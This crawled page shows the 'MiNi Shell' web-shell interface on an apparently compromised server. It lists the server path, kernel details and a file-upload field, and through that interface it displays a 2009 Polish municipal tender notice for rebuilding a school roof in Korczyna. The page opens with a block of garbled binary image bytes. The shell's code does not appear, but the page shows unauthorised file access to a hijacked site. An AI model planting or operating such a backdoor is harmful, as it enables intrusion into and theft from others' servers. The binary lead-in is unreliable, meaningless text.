JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/113644-N-2009.html

<p class="kh_header"><b>Korczyna: Przebudowa dachu budynku nr 1 Gimnazjum w Korczynie</b><br>
<b>Numer ogłoszenia: 113644 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dachu budynku nr 1 Gimnazjum w Korczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia obejmuje między innymi:
a/ roboty rozbiórkowe:
- rozebranie rynien dachowych, rur spustowych i obróbek blacharskich
- skucie żelbetowego gzymsu
- rozebranie betonowych czapek kominowych
- wykucie otworów w płytach korytkowych stropodachu dla oparcia podwalin
- wykucie gniazd w wieńcu dla zakotwienia elementów mocujących murłaty
- wywiezienie gruzu na odległość do 5 km
b/ roboty murarskie ścian kolankowych:
- zabetonowanie kotew w wykutych wcześniej gniazdach
- wymurowanie ścian kolankowych gr. 25 cm i wysokości 50 cm z cegły pełnej
c/ drewniana konstrukcja dachowa:
- wykonanie drewnianej konstrukcji dachowej 
- wyprofilowanie (struganie końców krokwi z bejcowaniem
d/ roboty murarskie ścian szczytowych:
-wymurowanie ścian szczytowych gr. 19 cm pustaków MAX
- zabetonowanie słupków i wieńca usztywniających ściany szczytowe
e/roboty murarskie kominów wieloprzewodowych:
- wymurowanie kominów wieloprzewodowych z cegły pełnej do poziomu połaci   
   dachowych
- wymurowanie kominów wieloprzewodowych z cegły pełnej klinkierowej ponad  
  poziomem połaci dachowych
- zabetonowanie połaci kominowych
f/pokrycia dachowe:
- zamontowanie folii paroprzepuszczalnej na gotowej więźbie dachowej
- wykonanie pełnego deskowania okapu deskami jednostronnie struganymi 
  bejcowanymi
- wykonanie łacenia połaci dachowych
- wykonanie pokrycia dachowego z powlekanej blachy trapezowej T35 z 
  wykonaniem kompletu obróbek blacharskich 
- montaż rynien dachowych i rur spustowych PCV
g/zabetonowanie otworów w stropodachu:
- zabetonowanie wykutych wcześniej otworów w płytkach korytkowych 
  stropodachu
- uzupełnienie porycia dachowego papą na lepiku
h/ izolacja z wełny mineralnej
- zamontowanie ocieplenia z wełny mineralnej gr. 16 cm na starym pokryciu 
  dachowym stropodachu.
Przedmiot zamówienia należy wykonać zgodnie z projektem budowlanym. Szczegółowy zakres przedmiotu zamówienia określa przedmiar robót stanowiący załącznik nr 3 do niniejszej specyfikacji.

2. Wymagania dodatkowe w ramach przedmiotu zamówienia:

Wykonawca zobowiązuje się:
a/wykonać przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisami prawnymi, w szczególności z Prawem budowlanym, wraz z przepisami wykonawczymi, przepisami BHP, postanowieniami umowy, specyfikacją istotnych warunków zamówienia, zgodnie z aktualnym poziomem wiedzy technicznej, należytą starannością, etyka zawodową, przez osoby posiadające wymagane kwalifikacje i uprawnienia
b/zastosowane przez Wykonawcę materiały i urządzenia muszą być dopuszczone do obrotu, stosowania w budownictwie, muszą posiadać niezbędne, zgodne z przepisami prawa atesty i aprobaty
c/wykonać przedmiot zamówienia własnymi siłami, bez zlecania prac podwykonawcom
d/udzielić minimum 36 miesięcy gwarancji jakości i rękojmi na wykonany przedmiot zamówienia,
e/za ewentualne szkody spowodowane podczas prac budowlanych na nieruchomościach objętych inwestycją odpowiada Wykonawca
f/wyznaczenia osoby do kontaktowania się bezpośrednio z Zamawiającym w sprawie wykonania przedmiotu umowy
g/wykonania prac dodatkowych zleconych przez Zamawiającego o wartości do 50% zamówienia podstawowego. W przypadku konieczności wykonania takich prac Wykonawca przed przystąpieniem do ich realizacji przedstawi Zamawiającemu kosztorys do uzgodnienia. Zlecenie wykonania prac dodatkowych nastąpi przez podpisanie odrębnej umowy. 
h/niewykorzystywania otrzymanych materiałów celu innym niż określono w umowie, a w szczególności nie ma prawa udostępniać je osobom trzecim
i/Wykonawca oświadcza, że przy realizacji przedmiotu umowy nie dokona naruszenia cudzych praw wyłącznych oraz, że w razie stwierdzenia ich naruszenia poniesie wszelkie konsekwencje prawne i finansowe z tytułu ewentualnych roszczeń.
j/w przypadku zmiany obowiązujących przepisów prawa w szczególności związanych z przedmiotem zamówienia Zamawiający i Wykonawca określą zakres czynności zmierzających do wypełnienia postanowień umowy i sposób ich realizacji.
k/Wykonawca zobowiązuje się do stałego kontaktu z Zamawiającym w sprawach dotyczących przedmiotu zamówienia.
l/Wykonawca ponosi odpowiedzialność za jakość przedmiotu umowy oraz terminowość jego wykonania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r Prawa zamówień publicznych (Dz.U. z 2007r. Nr 223, poz. 1655 z późn.zm.).
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców określonych w art. 24 ustawy z dnia 29 stycznia 2004r Prawa zamówień publicznych (Dz.U. z 2007r. Nr 223, poz. 1655 z późn.zm.).	
3. Zamawiający odrzuca ofertę, która podlega odrzuceniu na podstawie art. 89 ust. 1 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych (Dz.U. z 2007r. Nr 223, poz. 1655z późn.zm.)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a/ formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1 do niniejszej 
    specyfikacji,
b/ oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust.1 
    Prawa zamówień publicznych i nie podlegania wykluczeniu z postępowania na 
    podstawie art. 24 Prawa zamówień publicznych - według załącznika nr 1 do 
    formularza ofertowego,
c/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 
    przed upływem terminu składania ofert,
d/ dokumenty potwierdzające uprawnienie do reprezentacji Wykonawcy przez 
    osoby podpisujące ofertę, o ile nie wynikają z przepisów prawa lub innych 
    dokumentów rejestrowych,
e/ zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca 
    nie zalega z opłacaniem podatków lub zaświadczenie, lub zaświadczenie, że 
    uzyskał zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności 
    lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione 
    nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
f/ zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych 
   potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubepieczenie 
   zdrowotne lub społeczne, wystawione nie wcześniej niż 3 miesiące przed 
   upływem składania ofert,
g/ wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w 
   wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji - według 
   załącznika nr 2 do formularza ofertowego,
h/ dokument potwierdzający, że Wykonawca posiada aktualne, wymagane 
   przepisami prawa, uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
   takich uprawnień oraz, dokument potwierdzający przynależność do właściwej 
   izby samorządu zawodowego,
i/ wykaz wykonanych w okresie ostatnich 5 lat (2004-2008) dwóch zamówień 
   związanych tematycznie z przedmiotem zamówienia, o wartości nie mniejszej niż 
   300.000 zł z podaniem wartości robót brutto, daty (rok), miejsca robót i nazwy 
   Zamawiającego - według załącznika nr 3 do formularza ofertowego,
j/ referencje potwierdzające, że roboty wymienione w lit. (i) zostały wykonane z 
   należytą starannością,
k/ w przypadku składania oferty wspólnej wymagane dokumenty muszą być złożone 
   dla każdego z wykonawców oddzielnie za wyjątkiem załącznika nr 2 oraz 
   załącznika nr 3 do formularza ofertowego, które to dokumenty wykonawcy 
   sporządzają wspólnie,
l/ w przypadku składania oferty wspólnej brany będzie pod uwagę łączny potencjał 
   kadrowy i techniczny oraz łączne kwalifikacje i doświadczenie składających 
   wspólną ofertę wykonawców,
ł/ polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
   ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
   gospodarczej. Okres ważności polisy lub innego dokumentu ubezpieczenia musi 
   obejmować co najmniej przewidziany przez zamawiającego w SIWZ okres 
   realizacji zadania, w innym przypadku wykonawca winien dołączyć do oferty 
   oświadczenie o przedłożeniu Zamawiającemu kolejnego dokumentu ubezpieczenia 
   niezwłocznie po wygaśnięciu polisy/ innego dokumentu ubezpieczenia, który 
   dołącza do oferty,
m/ oświadczenie o dokonaniu wizji lokalnej placu budowy oraz zapoznaniu się z 
   dokumentacją budowlano - wykonawczą,
n/ szczegółowy kosztorys budowlany z określeniem jednostkowych nakładów 
    rzeczowych: robocizny, materiałów i pracy sprzętu oraz z określeniem  stawki 
    roboczogodziny, kosztów pośrednich i zysku,
o/ proponowany okres gwarancji - minimum 36 miesięcy licząc od daty odbioru 
    końcowego.

Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 6,
38-420 Korczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 09:30, miejsce: Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 13,
38-420 Korczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com